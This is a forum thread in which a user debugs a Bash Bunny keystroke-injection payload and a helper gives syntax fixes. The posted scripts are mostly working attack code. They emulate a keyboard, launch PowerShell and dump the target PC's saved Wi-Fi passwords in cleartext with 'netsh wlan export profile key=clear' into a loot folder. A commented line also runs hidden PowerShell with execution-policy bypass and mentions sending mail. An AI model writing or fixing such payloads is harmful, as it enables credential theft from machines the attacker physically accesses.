Kristoxx Posted October 9, 2023

I have the following script:

```
######## INITIALIZATION ########
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE

######## ATTACK ########
LED ATTACK
DELAY 6000
RUN WIN powershell
ENTER
DELAY 3000
STRING $volume = (Get-WmiObject -Class Win32_Volume | Where-Object { $_.Label -eq "BashBunny" }).Name; Set-Location -Path "$volume\payloads\switch2" .\payload.ps1

# RUN WIN "powerShell -windowstyle hidden -ExecutionPolicy Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\payload.ps1')"
# Wait until mails are sent.
sleep 10
```

When executing, it gets stuck in PowerShell but does not write `$volume = ....` What could it be? I have tried making its execution slower with a delay, but got the same result.

dark_pyrro Posted October 10, 2023

You need to use QUACK on the Bunny.

suricato Posted October 13, 2023

Sorry that I changed accounts. I changed the code to use QUACK with STRING, but in the same way the execution of the BB stops on the previous line.

dark_pyrro Posted October 13, 2023

Post the full payload code here in its latest version.

Kristoxx Posted October 14, 2023

```
DUCKY_LANG es-la
GET SWITCH_POSITION
ATTACKMODE HID STORAGE

# Create directory under loot to store passwords in
mkdir -p /root/udisk/loot/WiPassDump
LED R 200
DELAY 6000

# Open windows run console
Q GUI r
Q DELAY 1000

# enter payload and execute
Q STRING notepad
ENTER
DELAY 1000
Q STRING hola
DELAY 1000
Q STRING $volume \= \(Get-WmiObject -Class Win32_Volume | Where-Object { $_.Label -eq "BashBunny" }).Name
Q STRING Set-Location -Path "$volume\loot\WiPassDump"
Q STRING netsh wlan export profile key=clear
ENTER

#Let code run, then sync
DELAY 5000
sync

# Wait for misc. to happen on computer
DELAY 1000

# Done!
LED G
```

dark_pyrro Posted October 14, 2023

You need to QUACK the DELAY lines as well as ENTER.

Also, I'd suggest using QUACK instead of Q. Q is the same as QUACK, but I (and others) have experienced strange behavior using Q. I haven't been digging any deeper into that as to why that might be the case, but I always use QUACK instead of Q.

There are other things in that payload that will need adjustment, but you will find that out.

Kristoxx Posted October 14, 2023

I have followed your instructions and corrected the code, but it still only runs powershell and then does not write anything; the light remains red.

```
DUCKY_LANG es-la
GET SWITCH_POSITION
ATTACKMODE HID STORAGE

# Create directory under loot to store passwords in
mkdir -p /root/udisk/loot/WiPassDump
LED R 200
QUACK DELAY 6000

# Open windows run console
QUACK GUI r
QUACK DELAY 1000

# enter payload and execute
QUACK STRING powershell
QUACK ENTER
QUACK DELAY 1000
QUACK STRING $volume \= \(Get-WmiObject -Class Win32_Volume | Where-Object { $_.Label -eq "BashBunny" }).Name
QUACK STRING Set-Location -Path "$volume\loot\WiPassDump"
QUACK STRING netsh wlan export profile key=clear
QUACK ENTER

#Let code run, then sync
QUACK DELAY 5000
sync

# Wait for misc. to happen on computer
QUACK DELAY 1000

# Done!
LED G
```

I think the problem is on the line:

```
QUACK STRING $volume \= \(Get-WmiObject -Class Win32_Volume | Where-Object { $_.Label -eq "BashBunny" }).Name
QUACK STRING Set-Location -Path "$volume\loot\WiPassDump"
QUACK STRING netsh wlan export profile key=clear
QUACK ENTER
```

I also wanted to thank you for the help. Greetings.

dark_pyrro Posted October 14, 2023

You probably need to escape the $ char and/or quote the whole line.